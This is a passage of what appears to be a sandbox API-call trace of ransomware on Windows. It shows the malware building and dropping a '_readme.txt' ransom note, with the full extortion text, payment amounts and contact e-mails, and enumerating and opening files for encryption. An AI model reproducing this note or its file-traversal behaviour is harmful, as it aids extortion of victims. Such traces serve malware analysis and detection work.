encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.553] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.553] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.554] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.554] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.554] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0201.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.554] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0201.555] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.555] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0201.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.555] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0201.555] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.556] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0201.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.556] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0201.556] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.557] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0201.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.557] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0201.557] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.557] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0201.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.557] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0201.557] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.557] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0201.557] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.558] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.558] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.559] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0201.559] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.559] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.559] PathFindFileNameW (pszPath="") returned="" [0201.559] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.560] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.560] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.560] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.560] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0201.560] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0201.560] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.561] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.561] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.561] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, 